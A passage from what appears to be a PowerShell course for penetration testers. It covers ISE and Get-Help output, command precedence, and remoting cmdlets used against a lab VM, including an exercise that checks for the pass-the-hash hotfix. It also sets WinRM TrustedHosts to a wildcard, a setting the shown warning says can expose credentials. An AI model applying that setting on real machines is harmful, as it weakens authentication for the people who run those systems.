Script pane lets you edit scripts by using buttons and keyboard shortcuts. You can also copy, cut, and paste text between the Script pane and the Command pane. You can use the selective run feature to run all or part of a script. To run part of a script, select the text you want to run, and then click the Run Script button. Or, press F5. Debugging Scripts You can use the Windows PowerShell ISE debugger to debug a Windows PowerShell script or function. When you debug a script, you can use menu items and shortcut keys to perform many of the same tasks that you would perform in the Windows PowerShell console. For example, to set a line breakpoint in a script, right-click the line of code, and then click Toggle Breakpoint. You can also use the Windows PowerShell debugger cmdlets in the Command pane just as you would use them in the console. Tab Completion Windows PowerShell ISE has tab completion for cmdlet names, parameter names, and Microsoft .NET Framework static types. To use tab completion, type the beginning of the name, and then press the TAB key. Getting Help Windows PowerShell ISE includes a searchable compiled Help file that describes Windows PowerShell ISE and Windows PowerShell. This Help file includes all the Help that is available from the Get-Help cmdlet. To view the Help file in Windows PowerShell ISE, use the Help menu. Or, press F1. The Help is context sensitive. For example, if you type Invoke-Item and then press F1, the Help file opens to the Help topic for the Invoke-Item cmdlet. And, you can use the Get-Help cmdlet in Windows PowerShell as you would in the Windows PowerShell console. Customizing the View You can use Windows PowerShell ISE features to move and to resize the Command pane, the Output pane, and the Script pane. You can show and hide the Script pane, and you can change the text size in all the panes. You can also use the $Host variable to change some aspects of the appearance of Windows PowerShell ISE, including the window title and the foreground and background colors in the Output pane. In addition, Windows PowerShell ISE has its own custom host variable, $psgHost. You can use this variable to customize Windows PowerShell ISE, including adding menus and menu items. Windows PowerShell ISE Profile Windows PowerShell ISE has its own Windows PowerShell profile, Microsoft.PowerShellISE_profile.ps1. In this profile, you can store functions, aliases, variables, and commands that you use in Windows PowerShell ISE. Items in the Windows PowerShell AllHosts profiles (CurrentUser\AllHosts and AllUsers\AllHosts) are also available in Windows PowerShell ISE, just as they are in any Windows PowerShell host program. However, the items in your Windows PowerShell console profiles are not available in Windows PowerShell ISE. Instructions for moving and reconfiguring your profiles are available in Windows PowerShell ISE Help and in about_Profiles. System Requirements -Operating Systems: - Windows 7 - Windows Server 2008 - Windows Server 2003 with Service Pack 2 - Windows Vista with Service Pack 1 - Windows XP with Service Pack 2 - Microsoft .NET Framework 3.0 - Windows PowerShell remoting requires Windows Remote Management 2.0. Notes - The Get-WinEvent cmdlet requires Windows Vista and later versions of Windows and the Microsoft .NET Framework 3.5. - The Export-Counter cmdlet runs only in Windows 7. Starting Windows PowerShell ISE - To start Windows PowerShell ISE, click Start, point to All Programs, point to Windows PowerShell, and then click Windows PowerShell ISE. - In the Windows PowerShell console, Cmd.exe, or in the Run box, type "powershell_ise.exe". SEE ALSO about_Profiles Get-Help PS C:\Users\Windows-32> ``` - Use ```Get-Help``` with ```wildcards``` to list help about ```“command”```. ```Powershell PS C:\Users\Windows-32> Get-Help *command* Name Category Synopsis ---- -------- -------- Get-Command Cmdlet Gets basic information about cmdlets and other elements of Windows Power... Invoke-Command Cmdlet Runs commands on local and remote computers. Measure-Command Cmdlet Measures the time it takes to run script blocks and cmdlets. Trace-Command Cmdlet Configures and starts a trace of the specified expression or command. about_command_precedence HelpFile Describes how Windows PowerShell determines which command to run. about_Command_Syntax HelpFile Describes the notation used for Windows PowerShell syntax in Help. about_Core_Commands HelpFile Lists the cmdlets that are designed for use with Windows PowerShell PS C:\Users\Windows-32> ``` ```Powershell PS C:\Users\Windows-32> Get-Help Get-Command NAME Get-Command SYNOPSIS Gets basic information about cmdlets and other elements of Windows PowerShell commands. SYNTAX Get-Command [[-Name] ] [-CommandType {Alias | Function | Filter | Cmdlet | ExternalScript | Application | Script | All}] [[-ArgumentList] ] [-Module ] [-Syntax] [-TotalCount ] [ ] Get-Command [-Noun ] [-Verb ] [[-ArgumentList] ] [-Module ] [-Syntax] [-Tot alCount ] [] DESCRIPTION The Get-Command cmdlet gets basic information about cmdlets and other elements of Windows PowerShell commands in th e session, such as aliases, functions, filters, scripts, and applications. Get-Command gets its data directly from the code of a cmdlet, function, script, or alias, unlike Get-Help, which ge ts its information from help topic files. Without parameters, "Get-Command" gets all of the cmdlets and functions in the current session. "Get-Command *" get s all Windows PowerShell elements and all of the non-Windows-PowerShell files in the Path environment variable ($en v:path). It groups the files in the "Application" command type. You can use the Module parameter of Get-Command to find the commands that were added to the session by adding a Win dows PowerShell snap-in or importing a module. RELATED LINKS Online version: http://go.microsoft.com/fwlink/?LinkID=113309 about_Command_Precedence Get-Help Get-PSDrive Get-Member Import-PSSession Export-PSSession REMARKS To see the examples, type: "get-help Get-Command -examples". For more information, type: "get-help Get-Command -detailed". For technical information, type: "get-help Get-Command -full". PS C:\Users\Windows-32> ``` ```Powershell PS C:\Users\Windows-32> Get-Help about_command_precedence TOPIC about_Command_Precedence SHORT DESCRIPTION Describes how Windows PowerShell determines which command to run. LONG DESCRIPTION This topic explains how Windows PowerShell determines which command to run, especially when a session contains more than one command with the same name. It also explains how to run commands that do not run by default, and it explains how to avoid command-name conflicts in your session. COMMAND PRECEDENCE When a session includes commands that have the same name, Windows PowerShell uses the following rules to decide which command to run. These rules become very important when you add commands to your session from modules, snap-ins, and other sessions. -- If you specify the path to a command, Windows PowerShell runs the command at the location specified by the path. For example, the following command runs the FindDocs.ps1 script in the C:\TechDocs directory: C:\TechDocs\FindDocs.ps1 As a security feature, Windows PowerShell does not run executable (native) commands, including Windows PowerShell scripts, unless the command is located in a path that is listed in the Path environment variable ($env:path) or unless you specify the path to the script file. To run a script that is in the current directory, specify the full path, or type a dot (.) to represent the current directory. For example, to run the FindDocs.ps1 file in the current directory, type: .\FindDocs.ps1 -- If you do not specify a path, Windows PowerShell uses the following precedence order when it runs commands: 1. Alias 2. Function 3. Cmdlet 4. Native Windows commands Therefore, if you type "help", Windows PowerShell first looks for an alias named "help", then a function named "Help", and finally a cmdlet named "Help". It runs the first "help" item that it finds. For example, assume you have a function named Get-Map. Then, you add or import a cmdlet named Get-Map. By default, Windows PowerShell runs the function when you type "Get-Map". -- When the session contains items of the same type that have the same name, such as two cmdlets with the same name, Windows PowerShell runs the item that was added to the session most recently. For example, assume you have a cmdlet named Get-Date. Then, you import another cmdlet named Get-Date. By default, Windows PowerShell runs the most-recently imported cmdlet when you type "Get-Date". HIDDEN and REPLACED ITEMS As a result of these rules, items can be replaced or hidden by items with the same name. -- Items are "hidden" or "shadowed" if you can still access the original item, such as by qualifying the item name with a module or snap-in name. For example, if you import a function that has the same name as a cmdlet in the session, the cmdlet is hidden (but not replaced) because it was imported from a snap-in or module. -- Items are "replaced" or "overwritten" if you can no longer access the original item. For example, if you import a variable that has the same name as a a variable in the session, the original variable is replaced and is no longer accessible. You cannot qualify a variable with a module name. Also, if you type a function at the command line and then import a function with the same name, the original function is replaced and is no longer accessible. RUNNING HIDDEN COMMANDS You can run particular commands by specifying item properties that distinguish the command from other commands that might have the same name. You can use this method to run any command, but it is especially useful for running hidden commands. Use this method as a best practice when writing scripts that you intend to distribute because you cannot predict which commands might be present in the session in which the script runs. QUALIFIED NAMES You can run commands that have been imported from a Windows PowerShell snap-in or module or from another session by qualifying the command name with the name of the module or snap-in in which it originated. You can qualify commands, but you cannot qualify variables or aliases. For example, if the Get-Date cmdlet from the Microsoft.PowerShell.Utility snap-in is hidden by an alias, function, or cmdlet with the same name, you can run it by using the snap-in-qualified name of the cmdlet: Microsoft.PowerShell.Utility\Get-Date To run a New-Map command that was added by the MapFunctions module, use its module-qualified name: MapFunctions\New-Map To find the snap-in or module from which a command was imported, use the following Get-Command command format: get-command | format-list -property Name, PSSnapin, Module For example, to find the source of the Get-Date cmdlet, type: get-command get-date | format-list -property Name, PSSnapin, Module Name : Get-Date PSSnapIn : Microsoft.PowerShell.Utility Module : CALL OPERATOR You can also use the Call operator (&) to run any command that you can get by using a Get-ChildItem (the alias is "dir"), Get-Command, or Get-Module command. To run a command, enclose the Get-Command command in parentheses, and use the Call operator (&) to run the command. &(get-command ...) - or - &(dir ... ) For example, if you have a function named Map that is hidden by an alias named Map, use the following command to run the function. &(get-command -name map -type function) - or - &(dir function:\map) You can also save your hidden command in a variable to make it easier to run. For example, the following command saves the Map function in the $myMap variable and then uses the Call operator to run it. $myMap = (get-command -name map -type function) &($myMap) If a command originated in a module, you can use the following format to run it. & For example, to run the Add-File cmdlet in the FileCommands module, use the following command sequence. $FileCommands = get-module -name FileCommands & $FileCommands Add-File REPLACED ITEMS Items that have not been imported from a module or snap-in, such as functions, variables, and aliases that you create in your session or that you add by using a profile can be replaced by commands that have the same name. If they are replaced, you cannot access them. Variables and aliases are always replaced even if they have been imported from a module or snap-in because you cannot use a call operator or a qualified name to run them. For example, if you type a Get-Map function in your session, and you import a function called Get-Map, the original function is replaced. You cannot retrieve it in the current session. AVOIDING NAME CONFLICTS The best way to manage command name conflicts is to prevent them. When you name your commands, use a name that is very specific or is likely to be unique. For example, add your initials or company name acronym to the nouns in your commands. Also, when you import commands into your session from a Windows PowerShell module or from another session, use the Prefix parameter of the Import-Module or Import-PSSession cmdlet to add a prefix to the nouns in the names of commands. For example, the following command avoids any conflict with the Get-Date and Set-Date cmdlets that come with Windows PowerShell when you import the DateFunctions module. import-module -name DateFunctions -prefix ZZ For more information, see Import-Module and Import-PSSession. SEE ALSO about_Path_Syntax about_Aliases about_Functions Alias (provider) Function (provider) Get-Command Import-Module Import-PSSession PS C:\Users\Windows-32> ``` ================================================ FILE: 20-Remoting-Part-1.md ================================================ #### 20. Remoting Part 1 ###### Running Cmdlets on remote computers - Help topics for ```Remoting``` ```PowerShell PS C:\Users\Administrator> Get-Help *remote* Name Category Module Synopsis ---- -------- ------ -------- Get-RDRemoteApp Function RemoteDesktop ... New-RDRemoteApp Function RemoteDesktop ... Set-RDRemoteApp Function RemoteDesktop ... Remove-RDRemoteApp Function RemoteDesktop ... Get-RDRemoteDesktop Function RemoteDesktop ... Set-RDRemoteDesktop Function RemoteDesktop ... about_Remote HelpFile Describes how to run remote commands in Windows PowerShell. about_Remote_Disconnected_Sess... HelpFile Explains how to disconnect from and reconnect to a PSSession about_Remote_FAQ HelpFile Contains questions and answers about running remote commands about_Remote_Jobs HelpFile Describes how to run background jobs on remote computers. about_Remote_Output HelpFile Describes how to interpret and format the output of remote commands. about_Remote_Requirements HelpFile Describes the system requirements and configuration requirements for about_Remote_Troubleshooting HelpFile Describes how to troubleshoot remote operations in Windows PowerShell. about_Remote_Variables HelpFile Explains how to use local and remote variables in remote PS C:\Users\Administrator> ``` - ```Cmdlet``` which accept parameter ```ComputerName``` ```PowerShell PS C:\Users\Administrator> Get-Command -CommandType Cmdlet -ParameterName ComputerName CommandType Name ModuleName ----------- ---- ---------- Cmdlet Add-Computer Microsoft.PowerShell.Management Cmdlet Clear-EventLog Microsoft.PowerShell.Management Cmdlet Connect-PSSession Microsoft.PowerShell.Core Cmdlet Enter-PSSession Microsoft.PowerShell.Core Cmdlet Get-EventLog Microsoft.PowerShell.Management Cmdlet Get-HotFix Microsoft.PowerShell.Management Cmdlet Get-Process Microsoft.PowerShell.Management Cmdlet Get-PSSession Microsoft.PowerShell.Core Cmdlet Get-Service Microsoft.PowerShell.Management Cmdlet Get-WmiObject Microsoft.PowerShell.Management Cmdlet Invoke-Command Microsoft.PowerShell.Core Cmdlet Invoke-WmiMethod Microsoft.PowerShell.Management Cmdlet Limit-EventLog Microsoft.PowerShell.Management Cmdlet New-EventLog Microsoft.PowerShell.Management Cmdlet New-PSSession Microsoft.PowerShell.Core Cmdlet Receive-Job Microsoft.PowerShell.Core Cmdlet Receive-PSSession Microsoft.PowerShell.Core Cmdlet Register-WmiEvent Microsoft.PowerShell.Management Cmdlet Remove-Computer Microsoft.PowerShell.Management Cmdlet Remove-EventLog Microsoft.PowerShell.Management Cmdlet Remove-PSSession Microsoft.PowerShell.Core Cmdlet Remove-WmiObject Microsoft.PowerShell.Management Cmdlet Rename-Computer Microsoft.PowerShell.Management Cmdlet Restart-Computer Microsoft.PowerShell.Management Cmdlet Set-Service Microsoft.PowerShell.Management Cmdlet Set-WmiInstance Microsoft.PowerShell.Management Cmdlet Show-EventLog Microsoft.PowerShell.Management Cmdlet Stop-Computer Microsoft.PowerShell.Management Cmdlet Test-Connection Microsoft.PowerShell.Management Cmdlet Write-EventLog Microsoft.PowerShell.Management PS C:\Users\Administrator> ``` ```PowerShell PS C:\Users\Windows10-32> Get-Command -CommandType Cmdlet | Where-Object {$_.Parameters.Keys -contains 'ComputerName'} CommandType Name Version Source ----------- ---- ------- ------ Cmdlet Add-Computer 3.1.0.0 Microsoft.PowerShell.Management Cmdlet Clear-EventLog 3.1.0.0 Microsoft.PowerShell.Management Cmdlet Connect-PSSession 3.0.0.0 Microsoft.PowerShell.Core Cmdlet Enter-PSSession 3.0.0.0 Microsoft.PowerShell.Core Cmdlet Get-EventLog 3.1.0.0 Microsoft.PowerShell.Management Cmdlet Get-HotFix 3.1.0.0 Microsoft.PowerShell.Management Cmdlet Get-Process 3.1.0.0 Microsoft.PowerShell.Management Cmdlet Get-PSSession 3.0.0.0 Microsoft.PowerShell.Core Cmdlet Get-Service 3.1.0.0 Microsoft.PowerShell.Management Cmdlet Get-WmiObject 3.1.0.0 Microsoft.PowerShell.Management Cmdlet Invoke-Command 3.0.0.0 Microsoft.PowerShell.Core Cmdlet Invoke-WmiMethod 3.1.0.0 Microsoft.PowerShell.Management Cmdlet Limit-EventLog 3.1.0.0 Microsoft.PowerShell.Management Cmdlet New-EventLog 3.1.0.0 Microsoft.PowerShell.Management Cmdlet New-PSSession 3.0.0.0 Microsoft.PowerShell.Core Cmdlet Receive-Job 3.0.0.0 Microsoft.PowerShell.Core Cmdlet Receive-PSSession 3.0.0.0 Microsoft.PowerShell.Core Cmdlet Register-WmiEvent 3.1.0.0 Microsoft.PowerShell.Management Cmdlet Remove-Computer 3.1.0.0 Microsoft.PowerShell.Management Cmdlet Remove-EventLog 3.1.0.0 Microsoft.PowerShell.Management Cmdlet Remove-PSSession 3.0.0.0 Microsoft.PowerShell.Core Cmdlet Remove-WmiObject 3.1.0.0 Microsoft.PowerShell.Management Cmdlet Rename-Computer 3.1.0.0 Microsoft.PowerShell.Management Cmdlet Restart-Computer 3.1.0.0 Microsoft.PowerShell.Management Cmdlet Set-Service 3.1.0.0 Microsoft.PowerShell.Management Cmdlet Set-WmiInstance 3.1.0.0 Microsoft.PowerShell.Management Cmdlet Show-EventLog 3.1.0.0 Microsoft.PowerShell.Management Cmdlet Stop-Computer 3.1.0.0 Microsoft.PowerShell.Management Cmdlet Test-Connection 3.1.0.0 Microsoft.PowerShell.Management Cmdlet Write-EventLog 3.1.0.0 Microsoft.PowerShell.Management PS C:\Users\Windows10-32> ``` - ```Cmdlet``` which accept parameter ```ComputerName``` and ```Credential``` ```PowerShell PS C:\Users\Administrator> Get-Command -CommandType Cmdlet -ParameterName ComputerName,Credential CommandType Name ModuleName ----------- ---- ---------- Cmdlet Add-Computer Microsoft.PowerShell.Management Cmdlet Add-Content Microsoft.PowerShell.Management Cmdlet Clear-Content Microsoft.PowerShell.Management Cmdlet Clear-EventLog Microsoft.PowerShell.Management Cmdlet Clear-Item Microsoft.PowerShell.Management Cmdlet Clear-ItemProperty Microsoft.PowerShell.Management Cmdlet Connect-PSSession Microsoft.PowerShell.Core Cmdlet Copy-Item Microsoft.PowerShell.Management Cmdlet Copy-ItemProperty Microsoft.PowerShell.Management Cmdlet Enter-PSSession Microsoft.PowerShell.Core Cmdlet Get-Content Microsoft.PowerShell.Management Cmdlet Get-EventLog Microsoft.PowerShell.Management Cmdlet Get-HotFix Microsoft.PowerShell.Management Cmdlet Get-Item Microsoft.PowerShell.Management Cmdlet Get-ItemProperty Microsoft.PowerShell.Management Cmdlet Get-Process Microsoft.PowerShell.Management Cmdlet Get-PSSession Microsoft.PowerShell.Core Cmdlet Get-Service Microsoft.PowerShell.Management Cmdlet Get-WmiObject Microsoft.PowerShell.Management Cmdlet Invoke-Command Microsoft.PowerShell.Core Cmdlet Invoke-Item Microsoft.PowerShell.Management Cmdlet Invoke-WmiMethod Microsoft.PowerShell.Management Cmdlet Join-Path Microsoft.PowerShell.Management Cmdlet Limit-EventLog Microsoft.PowerShell.Management Cmdlet Move-Item Microsoft.PowerShell.Management Cmdlet Move-ItemProperty Microsoft.PowerShell.Management Cmdlet New-EventLog Microsoft.PowerShell.Management Cmdlet New-Item Microsoft.PowerShell.Management Cmdlet New-ItemProperty Microsoft.PowerShell.Management Cmdlet New-PSDrive Microsoft.PowerShell.Management Cmdlet New-PSSession Microsoft.PowerShell.Core Cmdlet New-Service Microsoft.PowerShell.Management Cmdlet New-WebServiceProxy Microsoft.PowerShell.Management Cmdlet Receive-Job Microsoft.PowerShell.Core Cmdlet Receive-PSSession Microsoft.PowerShell.Core Cmdlet Register-WmiEvent Microsoft.PowerShell.Management Cmdlet Remove-Computer Microsoft.PowerShell.Management Cmdlet Remove-EventLog Microsoft.PowerShell.Management Cmdlet Remove-Item Microsoft.PowerShell.Management Cmdlet Remove-ItemProperty Microsoft.PowerShell.Management Cmdlet Remove-PSSession Microsoft.PowerShell.Core Cmdlet Remove-WmiObject Microsoft.PowerShell.Management Cmdlet Rename-Computer Microsoft.PowerShell.Management Cmdlet Rename-Item Microsoft.PowerShell.Management Cmdlet Rename-ItemProperty Microsoft.PowerShell.Management Cmdlet Reset-ComputerMachinePassword Microsoft.PowerShell.Management Cmdlet Resolve-Path Microsoft.PowerShell.Management Cmdlet Restart-Computer Microsoft.PowerShell.Management Cmdlet Save-Help Microsoft.PowerShell.Core Cmdlet Set-Content Microsoft.PowerShell.Management Cmdlet Set-Item Microsoft.PowerShell.Management Cmdlet Set-ItemProperty Microsoft.PowerShell.Management Cmdlet Set-Service Microsoft.PowerShell.Management Cmdlet Set-WmiInstance Microsoft.PowerShell.Management Cmdlet Show-EventLog Microsoft.PowerShell.Management Cmdlet Split-Path Microsoft.PowerShell.Management Cmdlet Start-Job Microsoft.PowerShell.Core Cmdlet Start-Process Microsoft.PowerShell.Management Cmdlet Stop-Computer Microsoft.PowerShell.Management Cmdlet Test-ComputerSecureChannel Microsoft.PowerShell.Management Cmdlet Test-Connection Microsoft.PowerShell.Management Cmdlet Test-Path Microsoft.PowerShell.Management Cmdlet Update-Help Microsoft.PowerShell.Core Cmdlet Write-EventLog Microsoft.PowerShell.Management PS C:\Users\Administrator> ``` ```PowerShell PS C:\Users\Administrator> Get-Command -CommandType Cmdlet | Where-Object {$_.Parameters.Keys -contains 'ComputerName' -and $_.Parameters.Keys -contains 'Credential'} CommandType Name ModuleName ----------- ---- ---------- Cmdlet Add-Computer Microsoft.PowerShell.Management Cmdlet Connect-PSSession Microsoft.PowerShell.Core Cmdlet Enter-PSSession Microsoft.PowerShell.Core Cmdlet Get-HotFix Microsoft.PowerShell.Management Cmdlet Get-PSSession Microsoft.PowerShell.Core Cmdlet Get-WmiObject Microsoft.PowerShell.Management Cmdlet Invoke-Command Microsoft.PowerShell.Core Cmdlet Invoke-WmiMethod Microsoft.PowerShell.Management Cmdlet New-PSSession Microsoft.PowerShell.Core Cmdlet Receive-PSSession Microsoft.PowerShell.Core Cmdlet Register-WmiEvent Microsoft.PowerShell.Management Cmdlet Remove-WmiObject Microsoft.PowerShell.Management Cmdlet Restart-Computer Microsoft.PowerShell.Management Cmdlet Set-WmiInstance Microsoft.PowerShell.Management Cmdlet Stop-Computer Microsoft.PowerShell.Management Cmdlet Test-Connection Microsoft.PowerShell.Management PS C:\Users\Administrator> ``` - ```Cmdlet``` which accept parameter ```ComputerName``` and not ```Session ``` ```PowerShell PS C:\Users\Administrator> Get-Command -CommandType Cmdlet | Where-Object {$_.Parameters.Keys -contains 'ComputerName' -and $_.Parameters.Keys -notcontains 'Session'} CommandType Name ModuleName ----------- ---- ---------- Cmdlet Add-Computer Microsoft.PowerShell.Management Cmdlet Clear-EventLog Microsoft.PowerShell.Management Cmdlet Get-EventLog Microsoft.PowerShell.Management Cmdlet Get-HotFix Microsoft.PowerShell.Management Cmdlet Get-Process Microsoft.PowerShell.Management Cmdlet Get-PSSession Microsoft.PowerShell.Core Cmdlet Get-Service Microsoft.PowerShell.Management Cmdlet Get-WmiObject Microsoft.PowerShell.Management Cmdlet Invoke-WmiMethod Microsoft.PowerShell.Management Cmdlet Limit-EventLog Microsoft.PowerShell.Management Cmdlet New-EventLog Microsoft.PowerShell.Management Cmdlet Register-WmiEvent Microsoft.PowerShell.Management Cmdlet Remove-Computer Microsoft.PowerShell.Management Cmdlet Remove-EventLog Microsoft.PowerShell.Management Cmdlet Remove-WmiObject Microsoft.PowerShell.Management Cmdlet Rename-Computer Microsoft.PowerShell.Management Cmdlet Restart-Computer Microsoft.PowerShell.Management Cmdlet Set-Service Microsoft.PowerShell.Management Cmdlet Set-WmiInstance Microsoft.PowerShell.Management Cmdlet Show-EventLog Microsoft.PowerShell.Management Cmdlet Stop-Computer Microsoft.PowerShell.Management Cmdlet Test-Connection Microsoft.PowerShell.Management Cmdlet Write-EventLog Microsoft.PowerShell.Management PS C:\Users\Administrator> ``` - ```Get-Member``` will enumerate the properties and methods of that object ```PowerShell PS C:\Users\Administrator> Get-Command -CommandType Cmdlet | Get-Member TypeName: System.Management.Automation.CmdletInfo Name MemberType Definition ---- ---------- ---------- Equals Method bool Equals(System.Object obj) GetHashCode Method int GetHashCode() GetType Method type GetType() ResolveParameter Method System.Management.Automation.ParameterMetadata ResolveParameter(string name) ToString Method string ToString() CommandType Property System.Management.Automation.CommandTypes CommandType {get;} DefaultParameterSet Property string DefaultParameterSet {get;} Definition Property string Definition {get;} HelpFile Property string HelpFile {get;} ImplementingType Property type ImplementingType {get;} Module Property psmoduleinfo Module {get;} ModuleName Property string ModuleName {get;} Name Property string Name {get;} Noun Property string Noun {get;} Options Property System.Management.Automation.ScopedItemOptions Options {get;set;} OutputType Property System.Collections.ObjectModel.ReadOnlyCollection[System.Management.Automation.PSTypeName] OutputType {get;} Parameters Property System.Collections.Generic.Dictionary[string,System.Management.Automation.ParameterMetadata] Parameters {get;} ParameterSets Property System.Collections.ObjectModel.ReadOnlyCollection[System.Management.Automation.CommandParameterSetInfo] ParameterSets {get;} PSSnapIn Property System.Management.Automation.PSSnapInInfo PSSnapIn {get;} RemotingCapability Property System.Management.Automation.RemotingCapability RemotingCapability {get;} Verb Property string Verb {get;} Visibility Property System.Management.Automation.SessionStateEntryVisibility Visibility {get;set;} DLL ScriptProperty System.Object DLL {get=$this.ImplementingType.Assembly.Location;} HelpUri ScriptProperty System.Object HelpUri {get=$oldProgressPreference = $ProgressPreference... PS C:\Users\Administrator> ``` - Run ```Get-HotFix``` on the remote machine In Local Machine ```PowerShell PS C:\Users\Administrator> $env:COMPUTERNAME WIN-2012-DC PS C:\Users\Administrator> $env:USERDOMAIN PFPT PS C:\Users\Administrator> $env:USERNAME Administrator PS C:\Users\Administrator> ``` In Remote Machine ```PowerShell PS C:\Windows\system32> $env:COMPUTERNAME JOHN-PC PS C:\Windows\system32> $env:USERDOMAIN John-PC PS C:\Windows\system32> $env:USERNAME John PS C:\Windows\system32> ``` ```PowerShell PS C:\Users\Administrator> Get-HotFix -ComputerName JOHN-PC -Credential John-PC\John ``` ```PowerShell PS C:\Users\Administrator> Enter-PSSession -Credential(Get-Credential) -ComputerName JOHN-PC cmdlet Get-Credential at command pipeline position 1 Supply values for the following parameters: Credential [JOHN-PC]: PS C:\Users\John\Documents> Get-HotFix [JOHN-PC]: PS C:\Users\John\Documents> exit ``` - ```Test-Connection``` ```PowerShell PS C:\Users\Administrator> foreach ($pc in ('JOHN-PC', 'localhost', 'google.com')) {Test-Connection $pc} Source Destination IPV4Address IPV6Address Bytes Time(ms) ------ ----------- ----------- ----------- ----- -------- WIN-2012-DC JOHN-PC 10.0.0.129 fe80::613e:76ef:5029:c2c1%12 32 0 WIN-2012-DC JOHN-PC 10.0.0.129 fe80::613e:76ef:5029:c2c1%12 32 0 WIN-2012-DC JOHN-PC 10.0.0.129 fe80::613e:76ef:5029:c2c1%12 32 0 WIN-2012-DC JOHN-PC 10.0.0.129 fe80::613e:76ef:5029:c2c1%12 32 0 WIN-2012-DC localhost 127.0.0.1 ::1 32 0 WIN-2012-DC localhost 127.0.0.1 ::1 32 0 WIN-2012-DC localhost 127.0.0.1 ::1 32 0 WIN-2012-DC localhost 127.0.0.1 ::1 32 0 WIN-2012-DC google.com 216.58.194.206 2607:f8b0:4005:806::200e 32 25 WIN-2012-DC google.com 216.58.194.206 2607:f8b0:4005:806::200e 32 16 WIN-2012-DC google.com 216.58.194.206 2607:f8b0:4005:806::200e 32 15 WIN-2012-DC google.com 216.58.194.206 2607:f8b0:4005:806::200e 32 17 PS C:\Users\Administrator> ``` ###### Exercise - Set up a Windows 7 VM on your computer. - Using ```Get-HotFix``` with the ```–ComputerName``` and ```-Credential``` parameters, check for the presence of ```KB2871997``` (the Pass the hash fix) on the VM ```PowerShell PS C:\Users\Administrator> Get-HotFix -ComputerName JOHN-PC -Credential John-PC\John -id KB2871997 Get-HotFix : Cannot find the requested hotfix on the 'JOHN-PC' computer. Verify the input and run the command again. At line:1 char:1 + Get-HotFix -ComputerName JOHN-PC -Credential John-PC\John -id KB2871997 + ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + CategoryInfo : ObjectNotFound: (:) [Get-HotFix], ArgumentException + FullyQualifiedErrorId : GetHotFixNoEntriesFound,Microsoft.PowerShell.Commands.GetHotFixCommand PS C:\Users\Administrator> ``` ```PowerShell PS C:\Users\Administrator> Enter-PSSession -Credential(Get-Credential) -ComputerName JOHN-PC cmdlet Get-Credential at command pipeline position 1 Supply values for the following parameters: Credential [JOHN-PC]: PS C:\Users\John\Documents> Get-HotFix [JOHN-PC]: PS C:\Users\John\Documents> Get-HotFix -id KB2871997 Get-HotFix : This command cannot find hot-fix on the machine 'localhost'. Verify the input and Run your command again. + CategoryInfo : ObjectNotFound: (:) [Get-HotFix], ArgumentException + FullyQualifiedErrorId : GetHotFixNoEntriesFound,Microsoft.PowerShell.Commands.GetHotFixCommand [JOHN-PC]: PS C:\Users\John\Documents> exit PS C:\Users\Administrator> ``` ###### Remoting Issues Fix - Disable Firewall - [```WSMan:\localhost\client\trustedhosts``` on local machine](https://github.com/Kan1shka9/PowerShell-for-Pentesters/blob/master/21-Remoting-Part-2.md#21-remoting-part-2) - [Windows Update Module for PowerShell Access Denied on Remote PC in Workgroup](https://community.spiceworks.com/topic/954498-windows-update-module-for-powershell-access-denied-on-remote-pc-in-workgroup?page=1#entry-4650660) - [Run remote powershell as administrator](https://serverfault.com/questions/473991/run-remote-powershell-as-administrator) ================================================ FILE: 21-Remoting-Part-2.md ================================================ #### 21. Remoting Part 2 ###### PowerShell Remoting - Based on ```WSMAN``` Protocol and uses ```WinRM``` - Needs port ```5985(HTTP)``` and ```5986(HTTPS)``` - Alternate ports possible - Using PowerShell Remoting - Trusted Domain (No special requirement) - WorkGroup ```(WSMan:\localhost\client\trustedhosts)``` - Running cmdlets which support Remoting - Changes made for this to work - ```WSMan:\localhost\client\trustedhosts``` on local machine - User should be part of local ```administrators group``` on the remote machine ![Image of ShowWindow](images/3.jpeg) - ```Local Machine``` ```PowerShell PS C:\Users\Administrator> $env:COMPUTERNAME WIN-2012-DC PS C:\Users\Administrator> $env:USERDOMAIN PFPT PS C:\Users\Administrator> $env:USERNAME Administrator PS C:\Users\Administrator> ``` ```PowerShell PS C:\Users\Administrator> Set-Item WSMan:\localhost\Client\TrustedHosts -Value * WinRM Security Configuration. This command modifies the TrustedHosts list for the WinRM client. The computers in the TrustedHosts list might not be authenticated. The client might send credential information to these computers. Are you sure that you want to modify this list? [Y] Yes [N] No [S] Suspend [?] Help (default is "Y"): Y PS C:\Users\Administrator> ``` ```PowerShell PS C:\Users\Administrator> Get-Item WSMan:\localhost\Client\TrustedHosts WSManConfig: Microsoft.WSMan.Management\WSMan::localhost\Client Type Name SourceOfValue Value ---- ---- ------------- ----- System.String TrustedHosts * PS C:\Users\Administrator> ``` - ```Remote Machine``` ```PowerShell PS C:\Windows\system32> $env:COMPUTERNAME JOHN-PC PS C:\Windows\system32> $env:USERDOMAIN John-PC PS C:\Windows\system32> $env:USERNAME John PS C:\Windows\system32> ``` ```PowerShell PS C:\Windows\system32> Set-Item WSMan:\localhost\Client\TrustedHosts -Value * WinRM Security Configuration. This command modifies the TrustedHosts list for the WinRM client. The computers in the TrustedHosts list might not be authenticated. The client might send credential information to these computers. Are you sure that you want to modify this list? [Y] Yes [N] No [S] Suspend [?] Help (default is "Y"): Y PS C:\Windows\system32> ``` ```PowerShell PS C:\Windows\system32> Get-Item WSMan:\localhost\Client\TrustedHosts WSManConfig: Microsoft.WSMan.Management\WSMan::localhost\Client Name Value Type ---- ----- ---- TrustedHosts * System.String PS C:\Windows\system32> ``` - ```Invoke-Command``` Cmdlet ```PowerShell PS C:\Users\Administrator> Get-Help Invoke-Command NAME Invoke-Command SYNOPSIS Runs commands on local and remote computers. SYNTAX Invoke-Command [-ScriptBlock] [-ArgumentList ] [-InputObject ] [-NoNewScope] [] Invoke-Command [[-ConnectionUri] ] [-ScriptBlock] [-AllowRedirection] [-ArgumentList ] [-AsJob] [-Authentication ] [-CertificateThumbprint ] [-ConfigurationName ] [-Credential ] [-EnableNetworkAccess] [-HideComputerName] [-InDisconnectedSession] [-InputObject ] [-JobName ] [-SessionOption ] [-ThrottleLimit ] [] Invoke-Command [[-ConnectionUri] ] [-FilePath] [-AllowRedirection] [-ArgumentList ] [-AsJob] [-Authentication ] [-ConfigurationName ] [-Credential ] [-EnableNetworkAccess] [-HideComputerName] [-InDisconnectedSession] [-InputObject ] [-JobName ] [-SessionOption ] [-ThrottleLimit ] [] Invoke-Command [[-ComputerName] ] [-FilePath] [-ApplicationName 